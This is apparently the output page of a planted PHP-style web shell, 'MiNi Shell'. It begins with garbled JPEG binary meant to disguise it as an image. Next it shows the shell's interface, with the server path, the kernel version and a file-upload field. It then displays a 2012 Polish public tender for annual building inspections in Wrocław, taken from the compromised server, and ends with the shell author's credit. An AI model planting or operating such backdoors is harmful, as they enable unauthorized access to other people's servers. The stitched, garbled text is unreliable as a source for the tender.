JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120731/278750-N-2012.html

<p class="kh_header"><b>Wrocław: Wykonanie okresowej kontroli stanu technicznego budynków - przeglądy jednoroczne (zgodnie z art.62 ust. 1, pkt 1 ustawy prawo budowlane Dz.U.06.156.1118 z późn. zm.), w budynkach będących w zasobie administrowanym przez AZWRSP w Legnicy</b><br>
<b>Numer ogłoszenia: 278750 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 71 356 39 19, faks 71 357 90 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie okresowej kontroli stanu technicznego budynków - przeglądy jednoroczne (zgodnie z art.62 ust. 1, pkt 1 ustawy prawo budowlane Dz.U.06.156.1118 z późn. zm.), w budynkach będących w zasobie administrowanym przez AZWRSP w Legnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Informacje dodatkowe dotyczące wykonania przedmiotu zamówienia. 
2.1.	 Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do nie zrealizowania całości zamówienia, tj. wyłączenia poszczególnych obiektów budowlanych
2.2.	Usługa będzie wykonywana na terenie czynnym. Należy przestrzegać porządku i zasad współżycia społecznego.
2.3.	Szczegółowy zakres zamówienia określają ISTOTNE POSTANOWIENIA UMOWY
2.4.	Przed złożeniem oferty zalecana jest wizja w terenie i w razie wątpliwości lub braków w dokumentacji, złożenie pisemnego zapytania.
2.5.	Wykonawca zobowiązany jest do udzielania 12 miesięcznej gwarancji na wykonany przedmiot zamówienia. 
2.6.	Dodatkowo do obowiązków Wykonawcy należy:
1)		uzgodnienie z Zamawiającym terminów wykonania kontroli i na tej podstawie sporządzenie harmonogramu wykonania przeglądów. Harmonogram musi zawierać wykaz obiektów budowlanych wskazanych przez Zamawiającego, wraz z terminami rozpoczęcia i zakończenia prac w tych obiektach budowlanych z zastrzeżeniem, że prace w poszczególnych obiektach budowlanych będą wykonywane sukcesywnie.
2)		przedstawienie Zamawiającemu do akceptacji harmonogramu wykonania usługi, w terminie 7 dni liczonych od dnia zawarcia umowy,
3)		powiadomienie najemców obiektów budowlanych o terminie wykonania przeglądu poprzez wywieszenie w budynkach zawiadomienia o terminach wykonywania kontroli z jednoczesnym pisemnym powiadomieniem Zamawiającego o wywieszeniu w obiektach budowlanych zawiadomień. W razie problemów z wejściem do obiektów budowlanych w celu dokonania przeglądu, Wykonawca zobowiązany jest do dwukrotnego, ponownego powiadomienia najemców obiektów budowlanych poprzez wywieszenie w obiekcie powiadomienia o kontroli z jednoczesnym pisemnym powiadomieniem Zamawiającego o wywieszeniu w budynkach zawiadomień. Wykonawca winien dokonać co najmniej trzy razy wywieszek zawiadomień o przeglądach,
4)		usuniecie powiadomień o terminie wykonania przeglądu po przeprowadzeniu kontroli,
5)		dokonanie odpowiedniego wpisu do założonej książki obiektu budowlanego po realizacji okresowej kontroli,
6)		niezwłoczne zawiadomienie na piśmie Zamawiającego o każdym przypadku nieudostępnienia pomieszczeń w obiektach budowlanych w celu wykonania kontroli oraz o innych trudnościach w realizacji umowy,
7)		przekazanie Zamawiającemu protokołów z przeprowadzonych kontroli. Protokoły musza być sporządzone w formie pisemnej wydrukowanej w 2 egzemplarzach,
8)		zwrócenia Zamawiającemu, w terminie 14 dni od daty otrzymania wezwania od Zamawiającego, kwoty, stanowiącej równowartość wszelkiego rodzaju podatków, kar pieniężnych, grzywien i innych należności lub opłat, nałożonych w postępowaniu administracyjnym lub karnym na Zamawiającego, powstałych na skutek wszelkich zaniedbań Wykonawcy lub zaniedbań osób, przy których pomocy wykonuje on czynności wynikające z niniejszej umowy, albo, którym wykonywanie tych czynności powierza.
2.7.	Usługi należy wykonać zgodnie z ustawa z dnia 7 lipca 1994r Prawo Budowlane (Dz.U. z 2006r. nr 156, poz. 1118.z pózn. zm.), przepisami wykonawczymi i Polskimi Normami.
2.8.	Wykonawca zobowiązany jest w okresie trwania umowy do posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej obejmującej przedmiot zamówienia i przedłożenia umowy ubezpieczeniowej na żądanie Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania usług objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty:
2.1	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Na potwierdzenie, że wykonawca posiada niezbędną wiedzę i doświadczenie - to jest wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, przynajmniej 1 usługę polegającą na wykonaniu przeglądu okresowego jednorocznego ogólnobudowlanego lub pięcioletniego przeglądu ogólnobudowlanego na podstawie przeprowadzonej kontroli budowlanej, instalacyjnej obiektów budowlanych (zgodnie z art.62 ust 1 pkt 1 lub 2 ustawy prawo budowlane Dz.U.06.156.1118 z późn. zm.) o łącznej powierzchni tych obiektów w ramach jednej umowy nie mniejszej niż 2000m2 -  Wykonawca zobowiązany jest załączyć do oferty:
2.2.	Wykaz wykonanych usług, z podaniem ich wartości, przedmiotu, daty i miejsca wykonania 
2.3.	Dokumenty potwierdzające, że usługi z wykazu określonego wg wzoru formularza ofertowego zostały wykonane należycie. 
2.4.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym. Wykonawca zobowiązany jest załączyć do oferty:
2.7.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Na potwierdzenie, ze wykonawca dysponuje osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
2.5.	 Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacją na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. uprawnienia do nadzorowania i kierowania robotami budowlanymi w branży: konstrukcyjno - budowlanej lub architektonicznej, wraz z oświadczeniem o posiadaniu ważnego zaświadczenia o przynależności do izby zawodowej, - wg wzoru formularza ofertowego
2.6.	W przypadku, gdy Wykonawca poda informacje o osobie, którą będzie dysponował, musi dołączyć do oferty pisemne zobowiązanie (oświadczenie) tej osoby lub innych podmiotów o do udostępnienia osoby, która będzie uczestniczyć w wykonaniu zamówienia. 
2.7.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
2.8.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej: 
1. 	Zmiana terminu realizacji przedmiotu umowy:
a) 	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego tj., wstrzymanie realizacji umowy,
     b) 	zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego,
     c)	 brak dostępu do budynku, uniemożliwiający wykonanie usługi objętej umową.
2.	 Zmiany osobowe:
a) 	zmiana osób, przy pomocy których Wykonawca realizuje umowę na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa ustawie Prawo budowlane lub innych uprawnieniach,
b) 	zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem umowy po stronie Zamawiającego.
3	Zmiana wynagrodzenia:
a)	Zmniejszenie zakresu przedmiotu umowy niezależne od Wykonawcy służące celowemu wydatkowaniu środków. W takim przypadku przewidywane jest proporcjonalne zmniejszenie wynagrodzenia. 

4. 	Pozostałe zmiany:
a) siła wyższa uniemożliwiająca wykonanie umowy,
b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy np. zmiana rachunku bankowego, zmiana adresu itp.).

Wszelkie istotne zmiany treści niniejszej umowy wymagają zachowania formy pisemnego aneksu do umowy, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, 54-610 Wrocław, ul. Mińska 60,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 12:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, 54-610 Wrocław, ul. Mińska 60, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com